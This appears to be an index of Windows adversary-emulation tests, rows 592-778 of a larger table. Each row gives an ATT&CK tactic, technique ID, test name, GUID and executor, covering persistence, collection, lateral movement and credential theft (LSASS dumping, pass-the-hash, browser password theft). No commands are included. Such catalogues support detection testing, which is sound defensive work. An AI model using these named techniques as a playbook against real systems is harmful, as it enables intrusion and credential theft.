592 persistence T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
593 persistence T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
594 persistence T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
595 persistence T1136.002 Create Account: Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
596 persistence T1136.002 Create Account: Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
597 persistence T1136.002 Create Account: Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
598 persistence T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
599 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
600 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
601 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
602 persistence T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
603 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
604 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
605 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
606 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
607 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
608 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
609 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
610 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
611 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
612 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
613 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
614 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
615 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
616 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
617 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
618 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
619 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
620 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
621 persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
622 persistence T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
623 persistence T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
624 persistence T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
625 persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
626 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
627 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
628 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
629 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
630 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
631 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
632 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
633 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
634 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
635 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
636 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
637 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
638 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
639 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
640 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
641 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
642 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
643 persistence T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
644 persistence T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
645 persistence T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
646 persistence T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
647 persistence T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
648 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
649 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
650 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
651 collection T1560.001 Archive Collected Data: Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
652 collection T1560.001 Archive Collected Data: Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
653 collection T1560.001 Archive Collected Data: Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
654 collection T1560.001 Archive Collected Data: Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
655 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
656 collection T1113 Screen Capture 6 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
657 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
658 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
659 collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
660 collection T1074.001 Data Staged: Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
661 collection T1074.001 Data Staged: Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
662 collection T1114.001 Email Collection: Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
663 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
664 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
665 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
666 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
667 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
668 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
669 collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
670 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
671 collection T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
672 collection T1125 Video Capture 1 Registry artefact when application use webcam 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a command_prompt
673 collection T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
674 collection T1039 Data from Network Shared Drive 1 Copy a sensitive File over Administive share with copy 6ed67921-1774-44ba-bac6-adb51ed60660 command_prompt
675 collection T1039 Data from Network Shared Drive 2 Copy a sensitive File over Administive share with Powershell 7762e120-5879-44ff-97f8-008b401b9a98 powershell
676 collection T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
677 lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
678 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
679 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
680 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
681 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
682 lateral-movement T1021.006 Remote Services: Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
683 lateral-movement T1021.006 Remote Services: Windows Remote Management 2 Remote Code Execution with PS Credentials Using Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
684 lateral-movement T1021.006 Remote Services: Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
685 lateral-movement T1021.003 Remote Services: Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
686 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
687 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
688 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
689 lateral-movement T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
690 lateral-movement T1563.002 Remote Service Session Hijacking: RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
691 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
692 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
693 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
694 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
695 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 2 Changing RDP Port to Non Standard Port via Powershell 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 powershell
696 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 3 Changing RDP Port to Non Standard Port via Command_Prompt 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 command_prompt
697 credential-access T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
698 credential-access T1110.001 Brute Force: Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
699 credential-access T1110.001 Brute Force: Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
700 credential-access T1110.001 Brute Force: Password Guessing 6 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
701 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
702 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
703 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
704 credential-access T1003 OS Credential Dumping 4 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 powershell
705 credential-access T1003 OS Credential Dumping 5 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) 42510244-5019-48fa-a0e5-66c3b76e6049 powershell
706 credential-access T1003 OS Credential Dumping 6 Dump Credential Manager using keymgr.dll and rundll32.exe 84113186-ed3c-4d0d-8a3c-8980c86c1f4a powershell
707 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
708 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
709 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
710 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
711 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
712 credential-access T1003.002 OS Credential Dumping: Security Account Manager 4 PowerDump Hashes and Usernames from Registry 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
713 credential-access T1003.002 OS Credential Dumping: Security Account Manager 5 dump volume shadow copy hives with certutil eeb9751a-d598-42d3-b11c-c122d9c3f6c7 command_prompt
714 credential-access T1003.002 OS Credential Dumping: Security Account Manager 6 dump volume shadow copy hives with System.IO.File 9d77fed7-05f8-476e-a81b-8ff0472c64d0 powershell
715 credential-access T1003.002 OS Credential Dumping: Security Account Manager 7 WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb powershell
716 credential-access T1110.002 Brute Force: Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
717 credential-access T1003.004 OS Credential Dumping: LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
718 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
719 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
720 credential-access T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
721 credential-access T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
722 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
723 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
724 credential-access T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
725 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 1 Rubeus asreproast 615bd568-2859-41b5-9aed-61f6a88e48dd powershell
726 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 2 Get-DomainUser with PowerView d6139549-7b72-4e48-9ea1-324fc9bdf88a powershell
727 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 3 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 8c385f88-4d47-4c9a-814d-93d9deec8c71 powershell
728 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
729 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
730 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
731 credential-access T1555 Credentials from Password Stores 4 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 36753ded-e5c4-4eb5-bc3c-e8fba236878d powershell
732 credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
733 credential-access T1555 Credentials from Password Stores 6 WinPwn - Loot local Credentials - lazagne 079ee2e9-6f16-47ca-a635-14efcd994118 powershell
734 credential-access T1555 Credentials from Password Stores 7 WinPwn - Loot local Credentials - Wifi Credentials afe369c2-b42e-447f-98a3-fb1f4e2b8552 powershell
735 credential-access T1555 Credentials from Password Stores 8 WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords db965264-3117-4bad-b7b7-2523b7856b92 powershell
736 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
737 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
738 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
739 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 5 Simulating access to Opera Login Data 28498c17-57e4-495a-b0be-cc1e36de408b powershell
740 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
741 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
742 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
743 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 10 Stage Popular Credential Files for Exfiltration f543635c-1705-42c3-b180-efd6dc6e7ee7 powershell
744 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 11 WinPwn - BrowserPwn 764ea176-fb71-494c-90ea-72e9d85dce76 powershell
745 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 12 WinPwn - Loot local Credentials - mimi-kittenz ec1d0b37-f659-4186-869f-31a554891611 powershell
746 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 13 WinPwn - PowerSharpPack - Sharpweb for Browser Credentials e5e3d639-6ea8-4408-9ecd-d5a286268ca0 powershell
747 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 15 WebBrowserPassView - Credentials from Browser e359627f-2d90-4320-ba5e-b0f878155bbe powershell
748 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 16 BrowserStealer (Chrome / Firefox / Microsoft Edge) 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd powershell
749 credential-access T1552.004 Unsecured Credentials: Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
750 credential-access T1552.004 Unsecured Credentials: Private Keys 6 ADFS token signing and encryption certificates theft - Local 78e95057-d429-4e66-8f82-0f060c1ac96f powershell
751 credential-access T1552.004 Unsecured Credentials: Private Keys 7 ADFS token signing and encryption certificates theft - Remote cab413d8-9e4a-4b8d-9b84-c985bd73a442 powershell
752 credential-access T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
753 credential-access T1003.001 OS Credential Dumping: LSASS Memory 1 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
754 credential-access T1003.001 OS Credential Dumping: LSASS Memory 2 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
755 credential-access T1003.001 OS Credential Dumping: LSASS Memory 3 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
756 credential-access T1003.001 OS Credential Dumping: LSASS Memory 4 Dump LSASS.exe Memory using NanoDump dddd4aca-bbed-46f0-984d-e4c5971c51ea command_prompt
757 credential-access T1003.001 OS Credential Dumping: LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
758 credential-access T1003.001 OS Credential Dumping: LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
759 credential-access T1003.001 OS Credential Dumping: LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
760 credential-access T1003.001 OS Credential Dumping: LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
761 credential-access T1003.001 OS Credential Dumping: LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
762 credential-access T1003.001 OS Credential Dumping: LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
763 credential-access T1003.001 OS Credential Dumping: LSASS Memory 11 Dump LSASS with .Net 5 createdump.exe 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
764 credential-access T1003.001 OS Credential Dumping: LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
765 credential-access T1110.003 Brute Force: Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
766 credential-access T1110.003 Brute Force: Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
767 credential-access T1110.003 Brute Force: Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
768 credential-access T1110.003 Brute Force: Password Spraying 5 WinPwn - DomainPasswordSpray Attacks 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82 powershell
769 credential-access T1110.003 Brute Force: Password Spraying 6 Password Spray Invoke-DomainPasswordSpray Light b15bc9a5-a4f3-4879-9304-ea0011ace63a powershell
770 credential-access T1110.003 Brute Force: Password Spraying 8 Password Spray using Kerbrute Tool c6f25ec3-6475-47a9-b75d-09ac593c5ecb powershell
771 credential-access T1003.005 OS Credential Dumping: Cached Domain Credentials 1 Cached Credential Dump via Cmdkey 56506854-89d6-46a3-9804-b7fde90791f9 command_prompt
772 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
773 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 2 Crafting Active Directory golden tickets with Rubeus e42d33cd-205c-4acf-ab59-a9f38f6bad9c powershell
774 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
775 credential-access T1552.001 Unsecured Credentials: Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
776 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 WinPwn - sensitivefiles 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 powershell
777 credential-access T1552.001 Unsecured Credentials: Credentials In Files 7 WinPwn - Snaffler fdd0c913-714b-4c13-b40f-1824d6c015f2 powershell
778 credential-access T1552.001 Unsecured Credentials: Credentials In Files 8 WinPwn - powershellsensitive 75f66e03-37d3-4704-9520-3210efbe33ce powershell
